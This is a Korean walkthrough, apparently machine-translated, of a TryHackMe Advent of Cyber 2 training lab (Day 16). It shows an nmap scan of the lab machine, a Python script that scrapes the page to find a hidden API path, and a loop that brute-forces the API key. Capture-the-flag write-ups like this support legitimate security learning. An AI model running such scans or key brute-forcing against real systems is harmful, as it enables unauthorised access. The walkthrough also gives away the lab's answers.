이 논문에서는 TryHackMe에서 제공하는 'Advent of Cyber ​​2
"Advent of Cyber ​​2"는 "free room"(무료)에서 제공됩니다. 구독 없이 가상 머신을 "배포(Deploy)"할 수 있습니다.

「Advent of Cyber ​​2」의 Walkthrough 인덱스를 「 [TryHackMe] Advent of Cyber ​​2에 참여해 보았습니다. 」에서 공개했습니다.

[Day 16] Scripting: Help! Where is Santa?

스토리

무슨 일이야! 산타씨 가 날아 버렸다! 충실한 엘프들을 남겨주세요! 산타의 거처를 찾는데 협력할 수 있을까? 산타가 있는 곳을 찾는 데 도움을 주지 않겠습니까?

다행히 요정들은 OSINT 의 달인으로 몇 가지를 기억합니다. 구체적으로는 다음 사항입니다.

산타는 길을 잃은 엘프들이 집으로 돌아가는 길을 찾는 데 도움이 되는 웹 페이지 MACHINE_IP/static/index.html 를 가지고 있습니다. 그러나 산타는 웹 서버가 어떤 포트 번호로 작동하는지 엘프들에게 가르치지 않았습니다. 확인할 수 있습니까?

이 웹페이지의 어딘가에 링크가 숨겨져 있습니다. 엘프가 아닌 사람에게는 발견되지 않도록 숨겨져 있습니다.
- 산타의 썰매( Santa's Sled )에는 API 가 있습니다. API 의 키는 0〜100 이며 奇数 입니다. 하지만 조심! 알 수없는 횟수 시도 후 Santa's Sled는 귀하의 IP 주소를 금지합니다.

Santa's Sled 를 실행하는 컴퓨터를 배포하고 대상( MACHINE_IP )이 시작될 때까지 몇 분 정도 기다립니다. 15일째 파이썬 스킬을 사용하여 API의 올바른 키를 탐색합니다.

Day 16 - #1.

What is the port number for the web server?
nmap 를 사용하여 포트 스캔을 수행합니다.

kali@kali:~$ nmap -Pn -T4 -A -vv 10.10.64.46
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-16 22:51 EST
Nmap scan report for 10.10.64.46
Host is up, received user-set (0.26s latency).
Scanned at 2020-12-16 22:51:20 EST for 185s
Not shown: 999 closed ports
Reason: 999 conn-refused
PORT     STATE SERVICE  REASON  VERSION
8000/tcp open  http-alt syn-ack uvicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     date: Thu, 17 Dec 2020 03:52:01 GMT
|     server: uvicorn
|     content-length: 22
|     content-type: application/json
|     Connection: close
|     {"detail":"Not Found"}
|   GetRequest: 
|     HTTP/1.1 200 OK
|     date: Thu, 17 Dec 2020 03:51:55 GMT
|     server: uvicorn
|     content-type: text/html; charset=utf-8
|     content-length: 6992
|     last-modified: Mon, 23 Nov 2020 00:31:30 GMT
|     etag: 43d617909830c0d0a48bbbe8ea26ae39
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Santa's Tracker</title>
|     <link rel="shortcut icon" href="" type="image/x-icon">
|     <link rel="stylesheet" href="bulma.css">
|     <!-- Bulma Version 0.9.0-->
|     <link rel="stylesheet" type="text/css" href="../css/hero.css">
|     <!-- <link rel="stylesheet" href="https://unpkg.com/bulma-modal-fx/dist/css/modal-fx.min.css" /> -->
|     </head>
|     <body>
|     <section class="hero is-info is-medium is-bold">
|   HTTPOptions: 
|     HTTP/1.1 405 Method Not Allowed
|     date: Thu, 17 Dec 2020 03:52:07 GMT
|     server: uvicorn
|     content-length: 31
|     content-type: application/json
|     Connection: close
|_    {"detail":"Method Not Allowed"}
| http-methods: 
|_  Supported Methods: GET
|_http-server-header: uvicorn
|_http-title: Santa's Tracker
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.80%I=7%D=12/16%Time=5FDAD5DA%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,1C40,"HTTP/1\.1\x20200\x20OK\r\ndate:\x20Thu,\x2017\x20Dec\x2
SF:02020\x2003:51:55\x20GMT\r\nserver:\x20uvicorn\r\ncontent-type:\x20text
SF:/html;\x20charset=utf-8\r\ncontent-length:\x206992\r\nlast-modified:\x2
SF:0Mon,\x2023\x20Nov\x202020\x2000:31:30\x20GMT\r\netag:\x2043d617909830c
SF:0d0a48bbbe8ea26ae39\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n
SF:<html>\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x
SF:20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equ
SF:iv=\"X-UA-Compatible\"\x20content=\"IE=edge\">\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x2
SF:0initial-scale=1\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Santa's\x20
SF:Tracker</title>\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"shortcu
SF:t\x20icon\"\x20href=\"\"\x20type=\"image/x-icon\">\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"bulma\.css\">\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20<!--\x20Bulma\x20Version\x200\.9\.0-->\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/
SF:css\"\x20href=\"\.\./css/hero\.css\">\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20<!--\x20<link\x20rel=\"stylesheet\"\x20href=\"https://unpkg\.com/bu
SF:lma-modal-fx/dist/css/modal-fx\.min\.css\"\x20/>\x20-->\n\x20\x20\x20\x
SF:20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<sec
SF:tion\x20class=\"hero\x20is-info\x20is-medium\x20is-bold\">\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20")%r(FourOhFourRequest,AD,"HTTP/1\.1\x20404\x20Not
SF:\x20Found\r\ndate:\x20Thu,\x2017\x20Dec\x202020\x2003:52:01\x20GMT\r\ns
SF:erver:\x20uvicorn\r\ncontent-length:\x2022\r\ncontent-type:\x20applicat
SF:ion/json\r\nConnection:\x20close\r\n\r\n{\"detail\":\"Not\x20Found\"}")
SF:%r(HTTPOptions,BF,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\ndate
SF::\x20Thu,\x2017\x20Dec\x202020\x2003:52:07\x20GMT\r\nserver:\x20uvicorn
SF:\r\ncontent-length:\x2031\r\ncontent-type:\x20application/json\r\nConne
SF:ction:\x20close\r\n\r\n{\"detail\":\"Method\x20Not\x20Allowed\"}");

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.49 seconds

Santa's Tracking System
Are you an Elf that Santa has forgotten? Use this system to track Santa! Note: due to how many humans try to find where Santa is, the link is hidden on this webpage. You're going to have to manually click every single link Or perhaps there is a way to find all the links as fast as a Python?

Important notice All deliiveries to Skidy for TryHackMe jumpers are to be stopped. That man has asked for 613 on the premise that they are the softest jumper in the world. Please, we need to share them out.
Santa's Tracker 가 실행 중인 포트 번호를 확인할 수 있습니다. 실제로 액세스해 보겠습니다.

http://MACHINE_IP:PORT/static/index.html

"이 웹페이지에는 링크가 숨겨져 있습니다. 매뉴얼에서 모든 링크를 클릭해야 합니다."그리고 "또는 Python처럼 모든 링크를 빠르게 찾을 수있는 방법이있을 수 있습니다."라고.

Day 16 - #2.

Without using enumerations tools such as Dirbuster, what is the directory for the API? (without the API key)

linkgrabber.py

from bs4 import BeautifulSoup
import requests
html = requests.get('http://10.10.64.46:8000/static/index.html')
soup = BeautifulSoup(html.text, "lxml")
links = soup.find_all('a')
for link in links:
        if "href" in link.attrs:
                 print(link["href"])

kali@kali:~$ python3 linkgrabber.py | uniq
../

https://github.com/BulmaTemplates/bulma-templates/blob/master/templates/hero.html
https://tryhackme.com
#
http://machine_ip/api/api_key
#
https://github.com/BulmaTemplates/bulma-templates

Day 16 - #3.

Where is Santa right now?

Day 16 - #4.

Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
To unblock yourself, simply terminate and re-deploy the target instance

apibruter.py

import requests

api_key = 1
html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')

print(html.text)

kali@kali:~$ python3 apibruter.py 
{"item_id":1,"q":"Error. Key not valid!"}

apibruter_r.py

import requests

for api_key in range(1,100,2):
        print(f"api_key {api_key}")
        html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')
        print(html.text)

이것으로, 16일째의 미션이 종료입니다.